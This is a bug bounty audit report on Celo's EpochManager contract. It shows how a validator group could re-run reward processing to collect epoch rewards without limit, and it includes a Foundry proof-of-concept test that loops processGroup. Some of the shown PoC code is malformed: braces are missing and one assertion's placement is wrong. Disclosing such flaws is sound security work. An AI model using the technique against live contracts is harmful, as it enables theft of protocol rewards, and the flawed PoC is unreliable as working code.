#37058 [SC-High] Theft of remuneration through claims processing loops.

Submitted on Nov 24th 2024 at 05:14:27 UTC by @innertia for Audit Comp | Celo

  • Report ID: #37058

  • Report Type: Smart Contract

  • Report severity: High

  • Target: https://github.com/celo-org/celo-monorepo/blob/release/core-contracts/12/packages/protocol/contracts-0.8/common/EpochManager.sol

  • Impacts:

    • Theft of unclaimed royalties



In EpochManager, rewards are distributed by advancing the EpochProcess. However, if a group that has already received a reward loops through the process, it will be able to obtain as many rewards as it likes.

Vulnerability Details

In setToProcessGroups, rewards are assigned to the group corresponding to the electedAccounts.

        processedGroups[group] = epochRewards == 0 ? type(uint256).max : epochRewards;


After that, rewards are distributed within the processGroup.

      election.distributeEpochRewards(group, epochRewards, lesser, greater);


At this point, processedGroups are deleted, but electedAccounts are not deleted.

    delete processedGroups[group];


In other words, by starting setToProcessGroups again, rewards are assigned to the same groups corresponding to the electedAccounts again.

    for (uint i = 0; i < electedAccounts.length; i++) {
      address group = validators.getValidatorsGroup(electedAccounts[i]);


By repeating this, group can obtain as many rewards as they like. In the case of finishNextEpochProcess, where the same process is executed in batches, the electedAccounts are deleted each time the process is executed. This is not a problem.

      delete electedAccounts[i];
      delete electedSigners[i];


This problem occurs because there is no such process in setToProcessGroups.

Impact Details

A selected group of people can receive unlimited rewards.


https://github.com/celo-org/celo-monorepo/blob/4903cfa3744f4e03c5c042c3f881cc93d4807b21/packages/protocol/contracts-0.8/common/EpochManager.sol#L247. https://github.com/celo-org/celo-monorepo/blob/4903cfa3744f4e03c5c042c3f881cc93d4807b21/packages/protocol/contracts-0.8/common/EpochManager.sol#L288. https://github.com/celo-org/celo-monorepo/blob/4903cfa3744f4e03c5c042c3f881cc93d4807b21/packages/protocol/contracts-0.8/common/EpochManager.sol#L291. https://github.com/celo-org/celo-monorepo/blob/4903cfa3744f4e03c5c042c3f881cc93d4807b21/packages/protocol/contracts-0.8/common/EpochManager.sol#L236-L237. https://github.com/celo-org/celo-monorepo/blob/4903cfa3744f4e03c5c042c3f881cc93d4807b21/packages/protocol/contracts-0.8/common/EpochManager.sol#L336-L337.

Proof of Concept

First, as a preliminary preparation, modify the distributeEpochRewards of MockElection. In this mock, the value is simply assigned, but in the original function behaviour, the correct behaviour is to add. Therefore, modify it as follows.

function distributeEpochRewards(address group, uint256 value, address, address) external {

//distributedEpochRewards[group] = value;

distributedEpochRewards[group] += value;

* below is original function in Election.so
* function _distributeEpochRewards(address group, uint256 value, address lesser, address greater) internal {
* if (votes.total.eligible.contains(group)) {
* uint256 newVoteTotal = votes.total.eligible.getValue(group).add(value);
* votes.total.eligible.update(group, newVoteTotal, lesser, greater);
* }
* votes.active.forGroup[group].total = votes.active.forGroup[group].total.add(value);
* votes.active.total = votes.active.total.add(value);
* emit EpochRewardsDistributedToVoters(group, value);
* }


With this modification, the existing test will not fail.

Now, we will begin the test of reward theft. As this is a repurposed version of an existing test, I have only written comments for the important parts. Please add the following contract to EpochManager.t.sol. https://github.com/celo-org/celo-monorepo/blob/release/core-contracts/12/packages/protocol/test-sol/unit/common/EpochManager.t.sol

contract EpochManagerTest_UnlimitedReward is EpochManagerTest {

address signer1 = actor("signer1");
address signer2 = actor("signer2");
address signer3 = actor("signer3");
address signer4 = actor("signer4");

address validator3 = actor("validator3");
address validator4 = actor("validator4");

address group2 = actor("group2");

address[] elected;

uint256 groupEpochRewards = 44e18;

function setUp() public override {


accounts.setValidatorSigner(validator1, signer1);
accounts.setValidatorSigner(validator2, signer2);


accounts.setValidatorSigner(validator3, signer3);
accounts.setValidatorSigner(validator4, signer4);

address[] memory members = new address[](2);
members[0] = validator1;
members[1] = validator2;
validators.setMembers(group, members);

members[0] = validator3;
members[1] = validator4;
validators.setMembers(group2, members);

address[] memory valids = new address[](4);
valids[0] = validator1;
valids[1] = validator2;
valids[2] = validator3;
valids[3] = validator4;


deployCodeTo("MockRegistry.sol", abi.encode(false), PROXY_ADMIN_ADDRESS);

epochManager.initializeSystem(firstEpochNumber, firstEpochBlock, firstElected);
travelNL2Epoch(vm, 1);

elected = epochManager.getElectedAccounts();
election.setGroupEpochRewardsBasedOnScore(group, groupEpochRewards);



function test_UnlimitedReward() public {

//This is a normal process.
epochManager.processGroup(group, address(0), address(0));

//The amount of remuneration is also fine.
assertEq(election.distributedEpochRewards(group), groupEpochRewards);

//The problem is that you can loop the process as many times as you like (in this test, we set it to 10 times).

uint256 n = 10;
for (uint256 i = 0; i < n; i++) {
epochManager.processGroup(group, address(0), address(0));

//In addition to the first normal reward, you have received 11 rewards.

assertEq(election.distributedEpochRewards(group), groupEpochRewards * (n + 1));

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